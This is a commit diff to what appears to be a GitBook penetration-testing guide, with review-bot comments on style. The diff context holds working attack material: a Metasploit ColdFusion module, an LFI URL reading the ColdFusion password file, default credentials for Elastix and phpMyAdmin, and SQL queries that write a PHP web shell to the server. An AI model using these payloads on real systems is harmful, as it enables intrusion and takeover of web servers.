Commit 8a072563 authored by bobloblaw's avatar bobloblaw

Updates lead_to_compromise.md

Auto commit by GitBook Editor
parent 04e66a19
+1 −1
Original line number Diff line number Diff line
@@ -37,7 +37,7 @@
    * [HTTP - Web Vulnerabilities](web-services.md)
        * [Common web-services](common_web-services.md)
        * [WAF - Web application firewall](waf_-_web_application_firewall.md)
        * [Attacking the system](lead_to_compromise.md)
        * [Attacking the System](lead_to_compromise.md)
            * [Local file inclusion](local_file_inclusion.md)
            * [Remote file inclusion](remote_file_inclusion.md)
            * [Hidden Files and Directories](web-scanning.md)
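Review bot: the renamed entry "Attacking the System" still links to lead_to_compromise.md, so the filename no longer matches the chapter title; either rename the file and update this link, or accept the mismatch deliberately. Capitalization in the surrounding entries is also mixed ("Common web-services", "Local file inclusion" vs "Hidden Files and Directories"), so pick one convention for the whole list while touching it.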
+7 −3
@@ -21,6 +21,7 @@ It will say something like:


This works for version 8.0.1. So make sure to check the exact version.

```
use exploit/windows/http/coldfusion_fckeditor
```
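Review bot: "This works for version 8.0.1" does not say which product's version is meant; the module path exploit/windows/http/coldfusion_fckeditor implies ColdFusion, so write "ColdFusion 8.0.1" explicitly. The fenced block is also untagged; a language tag (for example ```text) renders consistently in GitBook.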
@@ -28,6 +29,7 @@ use exploit/windows/http/coldfusion_fckeditor
#### LFI

This will output the hash of the password. 

```
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```
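Review bot: "This will output the hash of the password." does not say which password; the traversal path in the URL ends in ColdFusion8/lib/password.properties, so stating that this is the ColdFusion administrator password file makes the LFI section self-contained. Tag the fence as well, as in the previous hunk.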
@@ -44,11 +46,11 @@ neo-security.xml and password.properties

## Elastix

Full of vulnerabilites. The old versions at least.
Full of vulnerabilities. The old versions at least.

http://example.com/vtigercrm/
default login is
admin:admin
`admin:admin`

You might be able to upload shell in profile-photo.

@@ -56,7 +58,7 @@ You might be able to upload shell in profile-photo.

## Phpmyadmin

Default credencials
Default credentials

```
root <blank>
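Review bot: "root <blank>" in the fenced block is ambiguous as to whether <blank> is a literal placeholder or means an empty password; "root with an empty password" (or "root:" with a note) removes the doubt. The fence is untagged here as well.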
@@ -78,12 +80,14 @@ Run SQL query/queries on server "localhost":
From here we can just run a sql-query that creates a php script that works as a shell

So we add the following query:

```
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"

# For linux
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
```

The query is pretty self-explanatory. Now you just visit `192.168.1.101/shell.php?cmd=ipconfig` and you have a working web-shell.
We can of course just write a superlong query with a better shell. But sometimes it is easier to just upload a simple web-shell, and from there download a better shell.

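Review bot: the INTO OUTFILE query only works when the MySQL account has the FILE privilege and secure_file_priv does not restrict the output directory; stating that precondition would explain why a hardened MySQL (secure_file_priv set, no FILE grant, database user not running as root) refuses the write, which is also the mitigation. The prose is inconsistent with the Linux variant: `shell.php?cmd=ipconfig` is a Windows command, so the Linux path example needs a Linux equivalent or a note. Style: "sql-query" and "php script" should be "SQL query" and "PHP script".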
+2 −2
# Lead to compromise
# Attacking the System

I know it is dubious to divide this up. Because in a sense most can be a starting vector to a complete compromise.
I have divided the web-vulnerabilites into two categories: **Attacking the System** and **Attacking the User**. I know this might seem like a pretty weird categorization, but I think it make sense. So in this chapter we will look at vulnerabilities that primarily focus on the webserver, and not the visiting users.
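Review bot: the added introduction has a grammar error and a typo: "I think it make sense" should be "I think it makes sense", and "web-vulnerabilites" should be "web vulnerabilities". Also "webserver" is usually written "web server".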